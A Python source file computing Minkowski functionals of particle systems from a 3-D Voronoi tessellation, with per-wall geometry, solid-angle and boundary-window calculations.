def norm(v):
    """Euclidean norm of the 1-D vector *v*."""
    return np.sqrt(np.dot(v, v))
def normvec(v):
    """Return *v* scaled to unit length."""
    return v / np.sqrt(np.dot(v, v))
def polarea2d(verts):
    """Area of a 2-D polygon given as an (N, 2) vertex array (shoelace formula)."""
    xs, ys = verts.T
    return np.abs(xs.dot(np.roll(ys, -1)) - ys.dot(np.roll(xs, -1))) / 2
def verttoedges(verts):
    """Return the closed edge list of *verts* as an array of [v[i-1], v[i]] pairs."""
    return np.array([np.array([verts[i - 1], verts[i]]) for i in range(len(verts))])
def kdt(points):
    """Thin wrapper: build a scipy cKDTree over *points*."""
    return sp.cKDTree(points)
def get_norms(rs, size):
    """Normalisation factors [(size-4r)^3, (size-4r)^2, size-4r] for
    volume, area and length measures at radius *rs* in a box of side *size*."""
    margin = size - 4 * rs
    return [margin ** 3, margin ** 2, margin]
def getplane_abcd(edges):
    """Plane through the first three points of *edges*: returns (n, d) with
    n . x + d = 0."""
    normal = np.cross(edges[1] - edges[0], edges[2] - edges[0])
    return normal, -np.dot(normal, edges[0])
def getline_abc(edge):
    """2-D line through the endpoints of *edge*: returns (n, c) with
    n . x + c = 0."""
    p0, p1 = edge[0], edge[1]
    n = np.array([p1[1] - p0[1], p0[0] - p1[0]])
    c = p0[1] * (p1[0] - p0[0]) - p0[0] * (p1[1] - p0[1])
    return n, c
def disttoplane(x, n, d):
    """Distance from point *x* to the plane n . p + d = 0, plus the foot of
    the perpendicular on that plane."""
    nn = np.dot(n, n)
    signed = np.dot(n, x) + d
    return np.abs(signed) / np.sqrt(nn), x - n * signed / nn
def center(verts):
    """Centroid (mean position) of the vertex array *verts*."""
    return verts.mean(axis=0)
def convcoor(nn, h, verts):
    """Project 3-D wall vertices into a 2-D in-plane coordinate frame.

    :param nn: unit normal of the wall plane
    :param h: foot point of the seed on the plane (becomes the 2-D origin)
    :param verts: 3-D vertex array
    :return: (2-D vertices, True if the origin lies inside the polygon,
              polar angles of the vertices)
    """
    cent = center(verts)
    xax = normvec(cent - h)   # x-axis: from foot point toward the centroid
    yax = np.cross(nn, xax)   # y-axis completes the in-plane frame
    vertsp = verts - h
    ys = np.dot(vertsp, yax)
    xs = np.dot(vertsp, xax)
    vertss = np.array([xs, ys]).T
    path = mpltpath.Path(vertss)
    if path.contains_point([0, 0]):
        return vertss, True, np.arctan2(ys, xs)
    return vertss, False, np.arctan2(ys, xs)
def vertstoedgesorted(verts):
    """Closed edge list of *verts* as sorted 2-tuples, so the same undirected
    edge always maps to the exact same key."""
    return [
        (verts[i - 1], verts[i]) if verts[i - 1] <= verts[i] else (verts[i], verts[i - 1])
        for i in range(len(verts))
    ]
class VCells:
    """Bookkeeping for Voronoi walls and partial Minkowski functionals (MFs).

    Walls are indexed by an id; per-wall geometry is accumulated in
    `wallparams` (a positional list extended by gen_wall_params — indices are
    referenced numerically throughout). NOTE(review): the original dump lost
    all indentation; nesting below is reconstructed from the logic — confirm
    against the original file.
    """

    def __init__(self):
        # (p1, p2) sorted point-index pair -> wall id
        self.pointstowall = {}
        # sorted vertex-index edge -> list of `d` values of adjoining walls
        self.adjm = {}
        # sorted vertex-index edge -> number of walls sharing it
        self.edgecounter = {}
        # wall id -> list of Voronoi vertex indices
        self.walls = {}
        # wall id -> [d, tpoints, <geometry appended by gen_wall_params>]
        self.wallparams = {}

    def add_wall(self, idd, ptinds, wall, d, tpoints):
        """Register wall *idd* between point pair *ptinds*, skipping walls
        that touch infinity (vertex index -1)."""
        offflag = False
        if any([x == -1 for x in wall]):
            offflag = True
        if ptinds[0] <= ptinds[1]:
            ind = (ptinds[0], ptinds[1])
        else:
            ind = (ptinds[1], ptinds[0])
        if not offflag:
            self.pointstowall[ind] = idd
            self.walls[idd] = wall
            self.wallparams[idd] = [d, tpoints]
            for edgeinds in vertstoedgesorted(wall):
                if not edgeinds in self.edgecounter:
                    self.edgecounter[edgeinds] = 1
                else:
                    self.edgecounter[edgeinds] += 1
                self.adjm.setdefault(edgeinds, []).append(d)

    def gen_wall_lists(self, size):
        """Build per-point lists of wall ids (idempotent).

        NOTE(review): uses a bare except on the attribute probe — any error in
        the generation body would also be swallowed silently.
        """
        try:
            self.walllists
            print("Walllists Already Generated")
            return
        except:
            self.walllists = [[] for _ in range(size)]
            print("Generating Walllists")
            st = time.time()
            for pinds, wallidd in self.pointstowall.items():
                self.walllists[pinds[0]].append(wallidd)
                self.walllists[pinds[1]].append(wallidd)
            print("Walllists generated")

    def gen_wall_params(self, vor, contributingwalls=None):
        """Precompute per-wall geometry (areas, distances, angles, solid
        angles) and append it positionally to wallparams[idd]."""
        print("Wall Based pre-computation running.")
        st = time.time()
        verbosecount = 0
        waltotnum = len(self.walls)
        for idd, wall in self.walls.items():
            if verbosecount % 200 == 0 and verbosecount != 0:
                print("\r " + str(100 * (verbosecount + 1) / waltotnum) + " % Processed", end="")
            verbosecount += 1
            if not contributingwalls == None:
                if idd not in contributingwalls:
                    continue
            # x, y: the two seed points generating this wall.
            x = self.wallparams[idd][1][0]
            y = self.wallparams[idd][1][1]
            verts = vor.vertices[wall]
            maxrforwall = 0
            vertdists = []
            for vert in verts:
                dt = dist(x, vert)
                vertdists.append(dt)
                if dt > maxrforwall:
                    maxrforwall = dt
            # Wall plane: perpendicular bisector of the segment x-y.
            n = x - y
            d = -n.dot(x + y) / 2
            dtp, h = disttoplane(x, n, d)
            verts2d, inside, thets = convcoor(normvec(n), h, verts)
            wallarea = polarea2d(verts2d)
            vert2dnorms = []
            for vert2d in verts2d:
                vert2dnorms.append(norm(vert2d))
            solangs = []
            dtes = []
            thetas = []
            sss = []
            for i, (edge2d, thet2) in enumerate(zip(verttoedges(verts2d), verttoedges(thets))):
                nop, c = getline_abc(edge2d)
                nopnormsq = np.einsum('i,i', nop, nop)
                nopnorm = np.sqrt(nopnormsq)
                dte = np.abs(c) / nopnorm  # distance from origin to the edge line
                dtes.append(dte)
                theta = thet2[1] - thet2[0]
                if inside:  # detect crossing at pi
                    if theta < -np.pi:
                        theta += 2 * np.pi
                    elif theta > np.pi:
                        theta -= 2 * np.pi
                s = np.abs(np.sin(theta))
                ccos = np.cos(theta)
                thetas.append((theta, s, ccos))
                # xdet: x-coordinate of the foot of the perpendicular on the edge line;
                # sss records whether it falls outside the edge segment.
                xdet = -nop[0] * c / nopnormsq
                if (xdet > edge2d[0][0] and xdet < edge2d[1][0]) or (xdet < edge2d[0][0] and xdet > edge2d[1][0]):
                    sss.append(False)
                else:
                    sss.append(True)
                if theta >= 0:
                    solangs.append(zfastsolang(dtp, vert2dnorms[i - 1], vert2dnorms[i], vertdists[i - 1], vertdists[i], s, ccos))
                else:
                    solangs.append(-zfastsolang(dtp, vert2dnorms[i - 1], vert2dnorms[i], vertdists[i - 1], vertdists[i], s, ccos))
            fullsolang = np.abs(np.sum(solangs))
            # Positional layout consumed by getrMF / gen_pMF:
            # [2]=fullsolang [3]=maxrforwall [4]=wallarea [5]=vertdists [6]=dtp
            # [7]=solangs [8]=dtes [9]=thetas [10]=vert2dnorms [11]=sss [12]=(verts2d, inside)
            self.wallparams[idd].extend((fullsolang, maxrforwall, wallarea, vertdists, dtp, solangs, dtes, thetas, vert2dnorms, sss, (verts2d, inside)))
        print()
        print("Wall Based precomputation completed. Time: " + str(time.time() - st))
        print()

    def gen_vol(self, rs, size):
        """Store volume/area/length normalisation factors for radius *rs*."""
        nvols = (size - 4 * rs) ** 3
        nareas = (size - 4 * rs) ** 2
        nlens = (size - 4 * rs)
        self.norms = [nvols, nareas, nlens]

    def gen_ptrcellvol(self, size, contributingwalls):
        """Accumulate each particle's Voronoi cell volume from its walls
        (pyramid volume: area * height / 3, split to both sides)."""
        self.ptrcellvol = [0 for _ in range(size)]
        print("Generating Particle cell volume")
        st = time.time()
        for pinds, idd in self.pointstowall.items():
            if idd not in contributingwalls:
                continue
            thisvol = self.wallparams[idd][4] * self.wallparams[idd][6] / 3.
            self.ptrcellvol[pinds[0]] += thisvol
            self.ptrcellvol[pinds[1]] += thisvol
        print("Particle cell volume Generated. Time: " + str(time.time() - st))

    def gen_wprMFs(self, rs, contributingwalls=None, accelerate=False, accelerator=None):  # one-side computation
        """Compute per-wall reduced MFs for every radius in *rs* via getrMF.

        accelerator, when given, holds per-wall lower/upper radius bounds used
        to skip walls that a ball of radius r cannot partially intersect.
        """
        global rtimewprMFs
        print("Calculating Reduced Minkowski Functionals.")
        self.wprMFs = [{} for _ in range(len(rs))]
        n = len(self.walls)
        if accelerate:
            print("Accelerating. This loses physical meaning for the wall partial MFs but they will not affect the pMF of balls.")
            if accelerator == None:
                assert False, "No Accelerator given"
        st = time.time()
        for i, r in enumerate(rs):
            freestoadd = 0
            verbosecount = 0
            stt = time.time()
            for idd, wall in self.walls.items():
                if not contributingwalls == None:
                    if idd not in contributingwalls:
                        continue
                if verbosecount % 200 == 0 and verbosecount != 0:
                    print("\r Integration " + str(100 * (verbosecount + 1) / n) + " % Processed", end="")
                if accelerate and (accelerator[0][idd] > r or accelerator[1][idd] < r):
                    continue
                else:
                    dstosend = []
                    for edgeinds in vertstoedgesorted(wall):
                        # Every interior Voronoi edge should be shared by
                        # exactly 3 walls; warn otherwise.
                        if len(self.adjm[edgeinds]) != 3:
                            print("NOT 3-cell edge: ", edgeinds, self.adjm[edgeinds], wall)
                        dstosend.append(self.adjm[edgeinds])
                    self.wprMFs[i][idd] = getrMF(idd, r, self.wallparams[idd], dstosend)
            rtime = time.time() - stt
            rtimewprMFs.append(rtime)
            print("\r\tComputation for r= " + str(r) + " done. Time: " + str(rtime), end="")
        print()
        print("Computation Completed. Time: " + str(time.time() - st))
        print()

    def gen_pMF(self, rs, totnum, boundinds, accelerate=False, ptrbound=None):
        """Sum wall contributions into per-particle MFs (self.pMF, shape
        (len(rs), totnum, 4)); boundary particles get zeros."""
        global rtimesum
        print("Summing over wall contributions")
        self.pMF = np.full((len(rs), totnum, 4), np.nan)
        if accelerate:
            print("Accelerating.")  # " Make sure the use of the ptrbound got from gen_wprMFs"
            if ptrbound == None:
                assert False, "No ptrbound or ptrcellvol given."
        st = time.time()
        ttt = 0
        for ir, r in enumerate(rs):
            stt = time.time()
            print("\r Summing for r= " + str(r) + " done.", end="")
            contpartind = 0
            for i in range(totnum):
                if i in boundinds:
                    self.pMF[ir, i, 0] = 0
                    self.pMF[ir, i, 1] = 0
                    self.pMF[ir, i, 2] = 0
                    self.pMF[ir, i, 3] = 0
                    continue
                stt = time.time()
                # Ball entirely inside its cell: analytic full-ball MFs.
                if accelerate and ptrbound[0][i] >= r:
                    self.pMF[ir, i, 0] = C_chi * r ** 3
                    self.pMF[ir, i, 1] = C_chi * r ** 2
                    self.pMF[ir, i, 2] = C_chi * r
                    self.pMF[ir, i, 3] = C_chi
                    contpartind += 1
                    continue
                # Ball covers the whole cell: volume saturates at the cell volume.
                if accelerate and ptrbound[1][i] <= r:
                    self.pMF[ir, i, 0] = self.ptrcellvol[i]
                    self.pMF[ir, i, 1] = 0
                    self.pMF[ir, i, 2] = 0
                    self.pMF[ir, i, 3] = 0
                    contpartind += 1
                    continue
                M0 = 0
                M1 = 0
                M2 = 0
                M3 = 0
                for idd in self.walllists[i]:
                    addval = self.wprMFs[ir][idd]
                    M0 += addval[0]
                    M1 += addval[1]
                    M2 += addval[1] / r - addval[2] / 2.  # Non trivial - sign!! divided by two sheels-> 1/2 factor
                    M3 += addval[1] / r ** 2 - addval[3] / 2. + addval[4] / 6.  # non trivial 1/6 each edge section is accessed 6 times, 2 times per cell
                self.pMF[ir, i, 0] = M0
                self.pMF[ir, i, 1] = M1
                self.pMF[ir, i, 2] = M2
                self.pMF[ir, i, 3] = M3
                contpartind += 1
            if contpartind + len(boundinds) != totnum:
                assert False, "Wrong adding"
            rtime = time.time() - stt
            rtimesum.append(rtime)
        print()
        print("Total pMF generated. Time: " + str(time.time() - st))

    def gen_MF(self, MD0, MD1, MD2, MD3):
        """Sum per-particle MFs into totals (self.MF) and densities (self.MFD)
        normalised by MD0; higher-order kinematic terms are commented out."""
        print("Summing over all contributing particles")
        copiedpMF = np.nan_to_num(self.pMF)  # to remove nan indicators
        self.MF = np.sum(copiedpMF, axis=1)
        self.MFD = self.MF.copy()
        for i in range(4):  # principal kinematical formula
            if i == 0:
                self.MFD[:, i] = self.MF[:, i] / MD0
            if i == 1:
                self.MFD[:, i] = self.MF[:, i] / MD0  # +self.MFD[:,i-1]*MD1/MD0
            if i == 2:
                self.MFD[:, i] = self.MF[:, i] / MD0  # +(2*self.MFD[:,i-1]*MD1)/MD0#self.MFD[:,i-2]*MD2+
            if i == 3:
                self.MFD[:, i] = self.MF[:, i] / MD0  # +(3*self.MFD[:,i-2]*MD2+3*self.MFD[:,i-1]*MD1)/MD0#self.MFD[:,i-3]*MD3+
        print("Total MF generated")

    def gen_MF_masked(self, normsize):
        """Like gen_MF, but normalised by the masked box volume normsize**3."""
        print("Summing over all contributing particles")
        copiedpMF = np.nan_to_num(self.pMF)  # to remove nan indicators
        self.MF = np.sum(copiedpMF, axis=1)
        self.MFD = self.MF.copy()
        for i in range(4):  # principal kinematical formula
            self.MFD[:, i] = self.MF[:, i] / normsize ** 3
        print("Total MF generated")

    def checkcount4(self):
        """Sanity check: count edges shared by more than 3 walls."""
        count = 0
        for _, val in self.edgecounter.items():
            if val > 3:
                count += 1
        return count

    def plotwall(self, idd, r=None):
        """Debug-plot wall *idd* in its 2-D plane (first two vertices larger),
        optionally with a circle of radius *r* around the origin."""
        fig = plt.figure(figsize=(8, 8))
        ax = fig.add_subplot(111, aspect="equal")
        First = 0
        for vert in self.wallparams[idd][12][0]:
            if First == 0:
                ax.scatter(*vert.T, s=50, c="green")
                First += 1
                continue
            elif First == 1:
                ax.scatter(*vert.T, s=25, c="green")
                First += 1
                continue
            ax.scatter(*vert.T, s=1, c="green")
        for edge in verttoedges(self.wallparams[idd][12][0]):
            ax.plot(*edge.T, lw=1, c="orange")
        ax.scatter([0, 0], [0, 0], s=3, c="red")
        if not r == None:
            circle1 = plt.Circle([0, 0], r, color='red', fill=False)
            ax.add_artist(circle1)
def getrMF(idd, r, wallparam, dss):
    """Per-wall contribution to one particle's Minkowski functionals at radius r.

    `wallparam` is the list built by gen_wall_params:
    [0] d (inter-point distance), [2] full solid angle, [3] max vertex
    distance, [4] wall area, [5] 3D vertex distances, [6] dtp (distance to
    the wall plane), [7] per-edge solid angles, [8] per-edge distances dte,
    [9] (theta, sin, cos) per edge, [10] 2D vertex norms, [11] per-edge
    crossing flags, [12] (2D vertices, inside-flag).
    `dss` carries the adjacent-wall distance triples per edge.

    Returns np.array([rM0, rM1, rM21, rM22, rM3]) — volume-like, surface,
    two curvature-type terms and the G (Euler-type) term.
    """
    if r <= wallparam[6]:
        # Sphere does not reach the wall plane yet: pure spherical-cap terms.
        return np.array([wallparam[2]*r**3/3, wallparam[2]*r**2/3, 0, 0, 0])
    elif r >= wallparam[3]:
        # Sphere covers the whole wall: the cell pyramid volume is the only term.
        return np.array([wallparam[4]*wallparam[6]/3., 0, 0, 0, 0])
    else:
        cos = wallparam[6]/r
        alpha = np.pi-2*np.arccos(cos)
        ropsq = r**2-wallparam[6]**2
        # rop: radius of the circle where the sphere intersects the wall plane.
        rop = np.sqrt(ropsq)
        if wallparam[12][1]:  # inside case
            # For each edge, decide whether the intersection circle stays
            # clear of it (True when the edge distance dte >= circle radius).
            dontevals = []
            for dte in wallparam[8]:
                if rop > dte:
                    dontevals.append(False)
                else:
                    dontevals.append(True)
            if all(dontevals):
                # Full circle lies inside the wall polygon.
                cc = 2*np.pi*rop
                return np.array([wallparam[2]*r**3/3-np.pi*((2*r+wallparam[6])*(r-wallparam[6])**2)/3.,
                    (wallparam[2]-2*np.pi*(1-cos))*r**2/3,
                    (cc*alpha)/6.,
                    wallparam[0]*cc/(3*r*rop),
                    0.])
            totsolang = wallparam[2]  # we substract from total angle
            totareatovol = 0
            totl = 0
            G = 0
            # area contribution from overlap
            edges = verttoedges(wallparam[12][0])
            packedvertdists = verttoedges(wallparam[10])
            packed3dvertdists = verttoedges(wallparam[5])
            for dte, theta, edge, packedvertdist, dd3, ds, ss, donteval, solang in zip(wallparam[8], wallparam[9], edges, packedvertdists, packed3dvertdists, dss, wallparam[11], dontevals, wallparam[7]):
                thetaabs = np.abs(theta[0])
                if donteval:
                    # Edge untouched by the circle: pure circular sector.
                    totareatovol += thetaabs*ropsq/2.
                    totsolang -= thetaabs*(1-cos)
                    totl += thetaabs*rop
                elif rop >= packedvertdist[0] and rop >= packedvertdist[1]:
                    # Both edge endpoints inside the circle: full triangle area.
                    totareatovol += np.abs(np.cross(*edge))/2.
                    totsolang -= np.abs(solang)  # zfastsolang(wallparam[6],packedvertdist[0],packedvertdist[1],dd3[0],dd3[1],theta[1],theta[2])
                else:
                    if packedvertdist[0] <= packedvertdist[1]:
                        if rop >= packedvertdist[0]:
                            # Single crossing, nearer vertex inside the circle.
                            v21 = edge[1]-edge[0]
                            v21n = norm(v21)
                            theta3 = np.arcsin(dte/rop)
                            theta2 = np.arccos(np.dot(v21, edge[1])/(packedvertdist[1]*v21n))
                            thetaf = theta3-theta2
                            thetan = thetaabs-thetaf
                            sin = np.sin(thetan)
                            totareatovol += thetaf*ropsq/2.+packedvertdist[0]*rop*np.sin(thetan)/2.
                            totl += thetaf*rop
                            totsolang -= thetaf*(1-cos)+zfastsolang(wallparam[6], rop, packedvertdist[0], r, dd3[0], sin, np.cos(thetan))  # dtp,rop,one,nprop,npone,sin,cos
                            # print(get_G_ijko(r,*ds)-get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds))
                            G += get_G_ijko(r, *ds)  # get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
                        elif ss:
                            # Closest plane point lies outside the segment: sector only.
                            totareatovol += thetaabs*ropsq/2.
                            totsolang -= thetaabs*(1-cos)
                            totl += thetaabs*rop
                        else:  # two crossings
                            intr = np.sqrt(ropsq-dte**2)
                            cccc = dte/rop
                            thetam = 2*np.arccos(cccc)
                            thetafn = thetaabs-thetam
                            totareatovol += intr*dte+thetafn*ropsq/2.
                            totl += thetafn*rop
                            totsolang -= thetafn*(1-cos)+zfastsolang(wallparam[6], rop, rop, r, r, np.sin(thetam), 2*(cccc)**2-1)  # dtp,rop,one,nprop,npone,sin,cos
                            G += 2*get_G_ijko(r, *ds)  # get_G_ijk(r,intr,*ds)
                    else:
                        # Mirror branch: the second vertex is the nearer one.
                        if rop >= packedvertdist[1]:
                            v21 = edge[0]-edge[1]
                            v21n = norm(v21)
                            theta3 = np.arcsin(dte/rop)
                            theta2 = np.arccos(np.dot(v21, edge[0])/(packedvertdist[0]*v21n))
                            thetaf = theta3-theta2
                            thetan = thetaabs-thetaf
                            sin = np.sin(thetan)
                            totareatovol += thetaf*ropsq/2.+packedvertdist[1]*rop*sin/2.
                            totl += thetaf*rop
                            totsolang -= thetaf*(1-cos)+zfastsolang(wallparam[6], rop, packedvertdist[1], r, dd3[1], sin, np.cos(thetan))
                            G += get_G_ijko(r, *ds)  # get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
                        elif ss:
                            totareatovol += thetaabs*ropsq/2.
                            totsolang -= thetaabs*(1-cos)
                            totl += thetaabs*rop
                        else:  # two crossings
                            intr = np.sqrt(ropsq-dte**2)
                            cccc = dte/rop
                            thetam = 2*np.arccos(cccc)
                            thetafn = thetaabs-thetam
                            totareatovol += intr*dte+thetafn*ropsq/2.
                            totl += thetafn*rop
                            totsolang -= thetafn*(1-cos)+zfastsolang(wallparam[6], rop, rop, r, r, np.sin(thetam), 2*(cccc)**2-1)
                            G += 2*get_G_ijko(r, *ds)  # get_G_ijk(r,intr,*ds)
        else:  # outside case: plane foot point lies outside the wall polygon
            dontevals = []
            meeting = False
            edges = verttoedges(wallparam[12][0])
            packedvertdists = verttoedges(wallparam[10])
            polcontrisolang = 0  # we substract
            totareatovol = 0
            totl = 0
            G = 0
            for packedvertdist, dte, ss in zip(packedvertdists, wallparam[8], wallparam[11]):  # Need fix
                if rop > dte:
                    dontevals.append(False)
                    if not meeting:
                        if not ss:
                            meeting = True
                        else:
                            # NOTE(review): both operands test packedvertdist[0];
                            # the second looks like it should be
                            # packedvertdist[1] — confirm against derivation.
                            if packedvertdist[0] < rop or packedvertdist[0] < rop:
                                meeting = True
                else:
                    dontevals.append(True)
            if not meeting:
                # Circle never reaches the polygon: untouched cap terms.
                return np.array([wallparam[2]*r**3/3, wallparam[2]*r**2/3, 0, 0, 0])
            packed3dvertdists = verttoedges(wallparam[5])
            for dte, theta, edge, packedvertdist, dd3, ds, ss, donteval, solang in zip(wallparam[8], wallparam[9], edges, packedvertdists, packed3dvertdists, dss, wallparam[11], dontevals, wallparam[7]):
                # Signed accumulation: edge orientation carries the sign.
                anticlock = np.sign(theta[0])
                thetaabs = np.abs(theta[0])
                # if i[0]==wallparam[12][3] or i[0]==wallparam[12][2]:
                # anticlock=-anticlock
                if donteval:
                    totareatovol += theta[0]*ropsq/2.
                    polcontrisolang += theta[0]*(1-cos)
                    totl += theta[0]*rop
                elif rop >= packedvertdist[0] and rop >= packedvertdist[1]:
                    totareatovol += anticlock*np.abs(np.cross(*edge))/2.
                    polcontrisolang += solang  # because we already included the sign
                else:
                    # print("here")
                    if packedvertdist[0] <= packedvertdist[1]:
                        if rop >= packedvertdist[0]:
                            v21 = edge[1]-edge[0]
                            v21n = norm(v21)
                            theta3 = np.arcsin(dte/rop)
                            theta2 = np.arccos(np.dot(v21, edge[1])/(packedvertdist[1]*v21n))
                            thetaf = theta3-theta2
                            thetan = thetaabs-thetaf
                            sin = np.sin(thetan)
                            totareatovol += anticlock*(thetaf*ropsq/2.+packedvertdist[0]*rop*np.sin(thetan)/2.)
                            totl += anticlock*thetaf*rop
                            polcontrisolang += anticlock*(thetaf*(1-cos)+zfastsolang(wallparam[6], rop, packedvertdist[0], r, dd3[0], sin, np.cos(thetan)))
                            G += get_G_ijko(r, *ds)  # get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
                        elif ss:
                            totareatovol += theta[0]*ropsq/2.
                            polcontrisolang += theta[0]*(1-cos)
                            totl += theta[0]*rop
                        else:  # two crossings
                            intr = np.sqrt(ropsq-dte**2)
                            cccc = dte/rop
                            thetam = 2*np.arccos(cccc)
                            thetafn = thetaabs-thetam
                            totareatovol += anticlock*(intr*dte+thetafn*ropsq/2.)
                            totl += anticlock*thetafn*rop
                            polcontrisolang += anticlock*(thetafn*(1-cos)+zfastsolang(wallparam[6], rop, rop, r, r, np.sin(thetam), 2*(cccc)**2-1))
                            G += 2*get_G_ijko(r, *ds)  # get_G_ijk(r,intr,*ds)
                    else:
                        if rop >= packedvertdist[1]:
                            v21 = edge[0]-edge[1]
                            v21n = norm(v21)
                            theta3 = np.arcsin(dte/rop)
                            theta2 = np.arccos(np.dot(v21, edge[0])/(packedvertdist[0]*v21n))
                            thetaf = theta3-theta2
                            thetan = thetaabs-thetaf
                            sin = np.sin(thetan)
                            totareatovol += anticlock*(thetaf*ropsq/2.+packedvertdist[1]*rop*np.sin(thetan)/2.)
                            totl += anticlock*thetaf*rop
                            polcontrisolang += anticlock*(thetaf*(1-cos)+zfastsolang(wallparam[6], rop, packedvertdist[1], r, dd3[1], sin, np.cos(thetan)))
                            G += get_G_ijko(r, *ds)  # get_G_ijk(r,np.sqrt(ropsq-dte**2),*ds)
                        elif ss:
                            totareatovol += theta[0]*ropsq/2.
                            polcontrisolang += theta[0]*(1-cos)
                            totl += theta[0]*rop
                        else:  # two crossings
                            intr = np.sqrt(ropsq-dte**2)
                            cccc = dte/rop
                            thetam = 2*np.arccos(cccc)
                            thetafn = thetaabs-thetam
                            totareatovol += anticlock*(intr*dte+thetafn*ropsq/2.)
                            totl += anticlock*thetafn*rop
                            polcontrisolang += anticlock*(thetafn*(1-cos)+zfastsolang(wallparam[6], rop, rop, r, r, np.sin(thetam), 2*(cccc)**2-1))
                            G += 2*get_G_ijko(r, *ds)  # get_G_ijk(r,intr,*ds)
            # print(totareatovol,polcontrisolang,totl)
            if polcontrisolang >= 0:
                totsolang = wallparam[2]-polcontrisolang
            else:
                totsolang = wallparam[2]+polcontrisolang
            # Signed sums may come out negative in the outside case.
            totareatovol = np.abs(totareatovol)
            totl = np.abs(totl)
        rM0 = totareatovol*wallparam[6]/3.+totsolang*r**3/3
        rM1 = totsolang*r**2/3
        rM21 = (alpha*totl)/6.
        rM22 = wallparam[0]*totl/(3*r*rop)
        rM3 = G/3
        return np.array([rM0, rM1, rM21, rM22, rM3])
def MinkFunc3d(rs, points, vor, size, boundary="optimal"):
    """Compute Minkowski functionals at radii `rs` from a precomputed Voronoi diagram.

    Parameters
    ----------
    rs : sequence of float
        Evaluation radii.
    points : array-like
        Particle positions inside a cubic box of side `size`.
    vor : scipy.spatial.Voronoi
        Voronoi tessellation of `points`.
    size : float
        Box side length.
    boundary : {"optimal", "mask"}
        Boundary treatment: "optimal" excludes cells touching the box and
        builds window functionals from the boundary walls; "mask" shrinks the
        window by twice the largest radius.

    Returns (optimal): VC, boundinds, M0tot, M1tot, M2tot, M3tot, rboundsforparticle.
    Returns (mask): VC, boundinds, normsize.
    """
    global rtimewprMFs, rtimesum
    rtimewprMFs = []
    rtimesum = []
    ttttime = time.time()
    totnum = len(points)
    if boundary == "optimal":
        print("Taking optimal boundary")
        # Mark particles whose cell is unbounded or reaches outside the box.
        boundinds = []
        contributingwalls = {}
        for i, pt in enumerate(points):
            if any([w == -1 for w in vor.regions[vor.point_region[i]]]):
                boundinds.append(i)
                continue
            if any([(v[0] < 0 or v[0] > size or v[1] < 0 or v[1] > size or v[2] < 0 or v[2] > size) for v in vor.vertices[vor.regions[vor.point_region[i]]]]):
                boundinds.append(i)
                continue
        print(str(len(boundinds))+" particles contributing by cell limitations.")
    VC = VCells()
    wallidit = 0
    boundedges = {}
    boundwalls = {}
    # Register every Voronoi ridge as a wall; walls between a boundary and an
    # interior particle are remembered for the window-functional sums.
    for ptinds, wall in vor.ridge_dict.items():
        d = dist(points[ptinds[0]], points[ptinds[1]])
        VC.add_wall(wallidit, ptinds, wall, d, [points[ptinds[0]], points[ptinds[1]]])
        if boundary == "optimal":
            if (ptinds[0] in boundinds):
                if ptinds[1] not in boundinds:
                    boundwalls[wallidit] = True
                    for i, edgeinds in enumerate(vertstoedgesorted(wall)):
                        boundedges.setdefault(edgeinds, []).extend((np.array(points[ptinds[1]]-points[ptinds[0]]), d, dist(*vor.vertices[[*edgeinds]])))
            if (ptinds[1] in boundinds):
                if ptinds[0] not in boundinds:
                    boundwalls[wallidit] = True
                    for i, edgeinds in enumerate(vertstoedgesorted(wall)):
                        boundedges.setdefault(edgeinds, []).extend((np.array(points[ptinds[0]]-points[ptinds[1]]), d, dist(*vor.vertices[[*edgeinds]])))
        wallidit += 1
    VC.gen_wall_lists(totnum)
    wls = VC.walllists
    verts = vor.vertices
    if boundary == "mask":
        print("Taking masked boundary")
        # Exclude particles within 2*max(rs) of any box face.
        boundinds = []
        contributingwalls = {}
        rmax2 = 2*np.max(rs)
        tr = size-rmax2
        for i, point in enumerate(points):
            if len(wls[i]) == 0:
                boundinds.append(i)
                continue
            if point[0] <= rmax2 or point[0] >= tr or point[1] <= rmax2 or point[1] >= tr or point[2] <= rmax2 or point[2] >= tr:
                boundinds.append(i)
                continue
            for idd in wls[i]:
                contributingwalls[idd] = True
        normsize = size-2*rmax2
        print(str(len(boundinds))+" particles contributing by cell limitations.")
    if boundary == "optimal":
        contributingwalls = {}
        for i, pt in enumerate(points):
            if i in boundinds:
                continue
            for idd in wls[i]:
                contributingwalls[idd] = True
    VC.gen_wall_params(vor, contributingwalls)  # contributing for at least one
    VC.gen_ptrcellvol(totnum, contributingwalls)  # contributing for at least one
    # print(len(contributingwalls),len(VC.walls))
    if boundary == "optimal":
        # Window functionals of the union of interior cells: volume from the
        # cells, surface from boundary walls, curvature from boundary edges.
        print("Generating Window MF.")
        M0tot = 0
        M1tot = 0
        M2tot = 0
        M3tot = 4*np.pi/3
        st = time.time()
        for i, pt in enumerate(points):
            if i in boundinds:
                continue
            M0tot += VC.ptrcellvol[i]
        for idd, _ in boundwalls.items():
            M1tot += VC.wallparams[idd][4]
        for _, val in boundedges.items():
            if len(val) != 6:
                print("?")
            M2tot += np.arccos(val[0].dot(val[3])/(val[1]*val[4]))*val[2]
        del boundedges
        M1tot = M1tot/3
        M2tot = M2tot/3
        print("Window MF generated. Time: "+str(time.time()-st))
    # Per-particle radius bounds: below rmin the ball is entirely inside the
    # cell, above rmax the cell is entirely covered — both are trivial cases.
    rboundsforparticle = [[], []]
    st = time.time()
    for i, point in enumerate(points):
        if i in boundinds:  # boundforalls
            rboundsforparticle[0].append(size)
            rboundsforparticle[1].append(0)
            continue
        rmin = size
        rmax = 0
        # print(i)
        for idd in wls[i]:
            thismin = VC.wallparams[idd][0]/2
            # print(idd)
            thismax = VC.wallparams[idd][3]
            if rmin >= thismin:
                rmin = thismin
            if rmax <= thismax:
                rmax = thismax
        rboundsforparticle[0].append(rmin)  # only make for valid particles
        rboundsforparticle[1].append(rmax)
    # Per-wall accelerator bounds derived from the two adjacent particles.
    accelerator = [{}, {}]
    for ptinds, idd in VC.pointstowall.items():
        # print(ptinds,idd)
        accelerator[0][idd] = min(rboundsforparticle[0][ptinds[0]], rboundsforparticle[0][ptinds[1]])
        accelerator[1][idd] = max(rboundsforparticle[1][ptinds[0]], rboundsforparticle[1][ptinds[1]])
    VC.gen_wprMFs(rs, contributingwalls, accelerate=True, accelerator=accelerator)
    VC.gen_pMF(rs, totnum, boundinds, accelerate=True, ptrbound=rboundsforparticle)
    if boundary == "optimal":
        VC.gen_MF(M0tot, M1tot, M2tot, M3tot)
